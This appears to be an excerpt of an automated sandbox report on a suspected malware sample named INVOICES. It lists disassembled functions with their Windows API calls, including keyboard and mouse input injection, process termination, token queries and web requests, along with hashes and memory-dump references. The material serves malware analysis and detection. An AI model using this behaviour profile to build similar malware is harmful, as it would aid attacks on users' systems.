                                                                                                                                  • Instruction ID: 6c48a54fe3a7b2b2951fa0a7c5e6812a261ff4d6a44f29e07b636376d31fdc15
                                                                                                                                  • Opcode Fuzzy Hash: eaad609140dfbb730a992a16d2fd80d562273d0c5f93854be68c1c0fec21b922
                                                                                                                                  • Instruction Fuzzy Hash: A7515931A00615EFDF15EFA4C849BEEB7B4EF48720F148069E945BB251CB78AE418B94
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0078F218
                                                                                                                                  • VariantClear.OLEAUT32(00000013), ref: 0078F28A
                                                                                                                                  • VariantClear.OLEAUT32(00000000), ref: 0078F2E5
                                                                                                                                  • _memmove.LIBCMT ref: 0078F30F
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0078F35C
                                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0078F38A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1101466143-0
                                                                                                                                  • Opcode ID: 7ed8216bdf440430c1aa743152b0f53d9a821a86ee91d9f049360274944ea7cc
                                                                                                                                  • Instruction ID: 8a3b4f7d0e22bcdcafb21bb2a68993d95310604d60e48c28929e66c28fc4a77d
                                                                                                                                  • Opcode Fuzzy Hash: 7ed8216bdf440430c1aa743152b0f53d9a821a86ee91d9f049360274944ea7cc
                                                                                                                                  • Instruction Fuzzy Hash: 9E5128B5A00209EFDB14DF58C884AAABBB8FF4C314B158569ED59DB301E734E951CFA0
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00792550
                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0079259B
                                                                                                                                  • IsMenu.USER32(00000000), ref: 007925BB
                                                                                                                                  • CreatePopupMenu.USER32 ref: 007925EF
                                                                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 0079264D
                                                                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0079267E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3311875123-0
                                                                                                                                  • Opcode ID: f30c6ed5e61f70cd5ac72150c2c316225e48869d7ff4ba88abd86b86bca34a4d
                                                                                                                                  • Instruction ID: d5198e56eec5eb39be3f80fd2f649959529dfd0711fc7431939802574213e46e
                                                                                                                                  • Opcode Fuzzy Hash: f30c6ed5e61f70cd5ac72150c2c316225e48869d7ff4ba88abd86b86bca34a4d
                                                                                                                                  • Instruction Fuzzy Hash: 8651A070601345FFCF20EF68E888BADBBF4BF44314F244159E85197A92D7789906CB51
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 0073179A
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 007317FE
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0073181B
                                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0073182C
                                                                                                                                  • EndPaint.USER32(?,?), ref: 00731876
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1827037458-0
                                                                                                                                  • Opcode ID: d37566ab20aa1909192c5d0c5173e6e2dd9cd586995b48c402f2ee9a2578e15a
                                                                                                                                  • Instruction ID: da72ce06492ab2eb3028353b314bc5d1a83fc1305c567be569ce1c2e3c544a12
                                                                                                                                  • Opcode Fuzzy Hash: d37566ab20aa1909192c5d0c5173e6e2dd9cd586995b48c402f2ee9a2578e15a
                                                                                                                                  • Instruction Fuzzy Hash: 8C41A030104704EFE710DF29CC88FB67BE8EB49774F044669FA95872A2C738A845DB65
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(007F57B0,00000000,010C49E0,?,?,007F57B0,?,007BB5DC,?,?), ref: 007BB746
                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 007BB76A
                                                                                                                                  • ShowWindow.USER32(007F57B0,00000000,010C49E0,?,?,007F57B0,?,007BB5DC,?,?), ref: 007BB7CA
                                                                                                                                  • ShowWindow.USER32(00000000,00000004,?,007BB5DC,?,?), ref: 007BB7DC
                                                                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 007BB800
                                                                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007BB823
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 642888154-0
                                                                                                                                  • Opcode ID: badac653824e6d201482395f2a81b5d9a33344b52c9f197c5316532de07f2f21
                                                                                                                                  • Instruction ID: f1dee1219734168ad410e97d9e78a1d07d3d82495f3bb3b3e45891d3b65d5099
                                                                                                                                  • Opcode Fuzzy Hash: badac653824e6d201482395f2a81b5d9a33344b52c9f197c5316532de07f2f21
                                                                                                                                  • Instruction Fuzzy Hash: 63414F34600144EFDB22CF25C889BD47BE5BB45714F5881BAED498F2A2CBB9A845CB91
                                                                                                                                  APIs
                                                                                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,007A4F57,?,?,00000000,00000001), ref: 007A71C1
                                                                                                                                    • Part of subcall function 007A3AB6: GetWindowRect.USER32(?,?), ref: 007A3AC9
                                                                                                                                  • GetDesktopWindow.USER32 ref: 007A71EB
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 007A71F2
                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007A7224
                                                                                                                                    • Part of subcall function 007952EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00795363
                                                                                                                                  • GetCursorPos.USER32(?), ref: 007A7250
                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007A72AE
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
APIs
  • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
  • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
  • Part of subcall function 0074FE06: _wcscpy.LIBCMT ref: 0074FE29
• _wcstok.LIBCMT ref: 0079ED20
• _wcscpy.LIBCMT ref: 0079EDAF
• _memset.LIBCMT ref: 0079EDE2
Strings
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
APIs
  • Part of subcall function 007883D1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007883E8
  • Part of subcall function 007883D1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007883F2
  • Part of subcall function 007883D1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00788401
  • Part of subcall function 007883D1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00788408
  • Part of subcall function 007883D1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0078841E
• GetLengthSid.ADVAPI32(?,00000000,00788757), ref: 00788B8C
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00788B98
• RtlAllocateHeap.NTDLL(00000000), ref: 00788B9F
• CopySid.ADVAPI32(00000000,00000000,?), ref: 00788BB8
• GetProcessHeap.KERNEL32(00000000,00000000,00788757), ref: 00788BCC
• HeapFree.KERNEL32(00000000), ref: 00788BD3
Similarity
• API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 169236558-0
APIs
• GetDC.USER32(00000000), ref: 0078BA77
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0078BA88
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0078BA8F
• ReleaseDC.USER32(00000000,00000000), ref: 0078BA97
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 0078BAAE
• MulDiv.KERNEL32(000009EC,?,?), ref: 0078BAC0
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00750313
• MapVirtualKeyW.USER32(00000010,00000000), ref: 0075031B
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00750326
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00750331
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00750339
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00750341
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007954A0
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007954B6
• GetWindowThreadProcessId.USER32(?,?), ref: 007954C5
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007954D4
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007954DE
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007954E5
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 007972EC
• RtlEnterCriticalSection.NTDLL(?), ref: 007972FD
• TerminateThread.KERNEL32(00000000,000001F6,?,00741044,?,?), ref: 0079730A
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,00741044,?,?), ref: 00797317
  • Part of subcall function 00796CDE: CloseHandle.KERNEL32(00000000,?,00797324,?,00741044,?,?), ref: 00796CE8
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0079732A
• RtlLeaveCriticalSection.NTDLL(?), ref: 00797331
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 82465cd7757894c7c1b689e890185e3d40189dc823cc05ad9c56dee7592b11b6
• Instruction ID: f020d2846baa660f072eafa7ff9281ae3bb2bf1bef914012360f083e8ba10b38
• Opcode Fuzzy Hash: 82465cd7757894c7c1b689e890185e3d40189dc823cc05ad9c56dee7592b11b6
• Instruction Fuzzy Hash: 80F05E36140612EBEB121B64ED8CEDE772AFF49B02B404731F602910A0CB795811CBA4
APIs
• VariantInit.OLEAUT32(?), ref: 007A8728
• CharUpperBuffW.USER32(?,?), ref: 007A8837
• VariantClear.OLEAUT32(?), ref: 007A89AF
  • Part of subcall function 0079760B: VariantInit.OLEAUT32(00000000), ref: 0079764B
  • Part of subcall function 0079760B: VariantCopy.OLEAUT32(00000000,?), ref: 00797654
  • Part of subcall function 0079760B: VariantClear.OLEAUT32(00000000), ref: 00797660
Strings
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
• Opcode ID: 7290276ba10b45f169ea6122e9de0d07ea84f3529c2f48075c06b2921e4740f1
• Instruction ID: 65918445078a1831349811e383e74648a1436c83cd6539507a454348e326d15c
• Opcode Fuzzy Hash: 7290276ba10b45f169ea6122e9de0d07ea84f3529c2f48075c06b2921e4740f1
• Instruction Fuzzy Hash: 37915975608301DFC750DF24C48496BBBE4AFC9714F148A6EF89A8B362DB39E905CB52
APIs
  • Part of subcall function 0074FE06: _wcscpy.LIBCMT ref: 0074FE29
• _memset.LIBCMT ref: 00792E7F
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00792EAE
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00792F61
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00792F8F
Strings
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: 0
• API String ID: 4152858687-4108050209
• Opcode ID: e2a0955afa224099ef2b12efd362be31b3f2984b19463e8136670319a97a562f
• Instruction ID: b689c0de7eefcfb4cb15d912d5dfc96f416136b73d65b6974e46ad7eb7b355cc
• Opcode Fuzzy Hash: e2a0955afa224099ef2b12efd362be31b3f2984b19463e8136670319a97a562f
• Instruction Fuzzy Hash: 2251D271608301AEDB25FF28E849A6BB7F5AF45310F144A2DF894D21A2DB78CD16C792
APIs
• CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0078D8E3
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0078D919
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0078D92A
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0078D9AC
Strings
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
• Opcode ID: e2d6ff8124b4477ad0e1f64af55b05a46c8b4a09177c0c9cb9d634e0f25cfc0d
• Instruction ID: 7229a7739ff0926162b4e4bf971b78bd5dd5b3615deb4251ed3c551695f3813f
• Opcode Fuzzy Hash: e2d6ff8124b4477ad0e1f64af55b05a46c8b4a09177c0c9cb9d634e0f25cfc0d
• Instruction Fuzzy Hash: 134190B1640204EFDB25EF55C884B9A7BA9EF49714B1181ADEC05DF285D7B8ED40CBA0
APIs
• _memset.LIBCMT ref: 00792AB8
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00792AD4
• DeleteMenu.USER32(?,00000007,00000000), ref: 00792B1A
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007F5890,00000000), ref: 00792B63
Strings
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
• Opcode ID: d0185fab37b5155d69a69f33bf51b141c3d308fe5f7116d1af3a42eabfb5eb24
• Instruction ID: e52c696fb24130615c8f93e0313c516f782d111a28facdc025237a6d438b85f8
• Opcode Fuzzy Hash: d0185fab37b5155d69a69f33bf51b141c3d308fe5f7116d1af3a42eabfb5eb24
• Instruction Fuzzy Hash: F741B471204301EFDB20EF24E885F5AB7E9AF85320F10465DF96597292D778E906CB62
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00790E58
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00790E74
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00790EDA
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00790F2C
Strings
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID: MZER
• API String ID: 432972143-2424380061
• Opcode ID: 6890d832d882f123578f76a1b707e45b89e2a010d502bc0168f1b342020769a5
• Instruction ID: eee59cb033e06474f5366b7146847dc11224b7548ca9be111d2243ffe308d79a
• Opcode Fuzzy Hash: 6890d832d882f123578f76a1b707e45b89e2a010d502bc0168f1b342020769a5
• Instruction Fuzzy Hash: EC315A30960218AEFF31DB24AC09BFE7BA5EF48310F18461AF4D0521D1C37D899597D5
APIs
• GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00790F97
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00790FB3
• PostMessageW.USER32(00000000,00000101,00000000), ref: 00791012
• SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00791064
Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                  • String ID: MZER
                                                                                                                                  • API String ID: 432972143-2424380061
                                                                                                                                  • Opcode ID: c9d10ec27f2430657c0be755c980e09dcfd6f2cc5dbd0cda8342e771ad577bb4
                                                                                                                                  • Instruction ID: a0c05d79b37944a3e2e3b4b9dc706be21b9af32ec9574f450cf32239d13424b9
                                                                                                                                  • Opcode Fuzzy Hash: c9d10ec27f2430657c0be755c980e09dcfd6f2cc5dbd0cda8342e771ad577bb4
                                                                                                                                  • Instruction Fuzzy Hash: A2313C30A40689DEFF348F28AC08BFA7B76BF45711F44431AE495521D1D37E49E197A1
                                                                                                                                  APIs
                                                                                                                                  • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007AD8D9
                                                                                                                                    • Part of subcall function 007379AB: _memmove.LIBCMT ref: 007379F9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharLower_memmove
                                                                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                                                                  • API String ID: 3425801089-567219261
                                                                                                                                  • Opcode ID: 3dc8c94e4b14a4f42142e52112563aef06a160bae0e4b502c7526049d4a34b51
                                                                                                                                  • Instruction ID: 779b235ed021d301f001d825d978966d8788c0adf14b08eabe04d7b7d87d7307
                                                                                                                                  • Opcode Fuzzy Hash: 3dc8c94e4b14a4f42142e52112563aef06a160bae0e4b502c7526049d4a34b51
                                                                                                                                  • Instruction Fuzzy Hash: C731ABB1500615EBCF24EF54C8949EEB3B4FF46320B10872AE866976D2DB79ED05CB80
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                    • Part of subcall function 0078AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0078AEC7
                                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007891D6
                                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007891E9
                                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00789219
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$_memmove$ClassName
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 365058703-1403004172
                                                                                                                                  • Opcode ID: 5ca8efd3368cabffbe648cf8d936e8073eb36f00d4deb3f8179d59b66f526f02
                                                                                                                                  • Instruction ID: c4a027383605ccb4aa93fb944d6d8c4ee3e33af528426a185db2be557806bcef
                                                                                                                                  • Opcode Fuzzy Hash: 5ca8efd3368cabffbe648cf8d936e8073eb36f00d4deb3f8179d59b66f526f02
                                                                                                                                  • Instruction Fuzzy Hash: 87210171A44108BAEB18BB65CC8EDFEB768EF45320F14422AF925971E1DB3D1D0AD710
                                                                                                                                  APIs
                                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0076D51C
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                  • _memset.LIBCMT ref: 0073418D
                                                                                                                                  • _wcscpy.LIBCMT ref: 007341E1
                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007341F1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                  • String ID: Line:
                                                                                                                                  • API String ID: 3942752672-1585850449
                                                                                                                                  • Opcode ID: 59afb548ec016d9ec5d6ce00ea7fe7c55730aa56a6d996e82e1899dc5ad23d17
                                                                                                                                  • Instruction ID: 2de087bf403ff50eb55a22b6b185f36c855f276067fe087a0e840dca575dd1a2
                                                                                                                                  • Opcode Fuzzy Hash: 59afb548ec016d9ec5d6ce00ea7fe7c55730aa56a6d996e82e1899dc5ad23d17
                                                                                                                                  • Instruction Fuzzy Hash: 3B31A6B1408708AAE735EB60DC4ABEB77E8BF44304F10461AF68592193EB7C6648C797
                                                                                                                                  APIs
                                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007A1962
                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007A1988
                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007A19B8
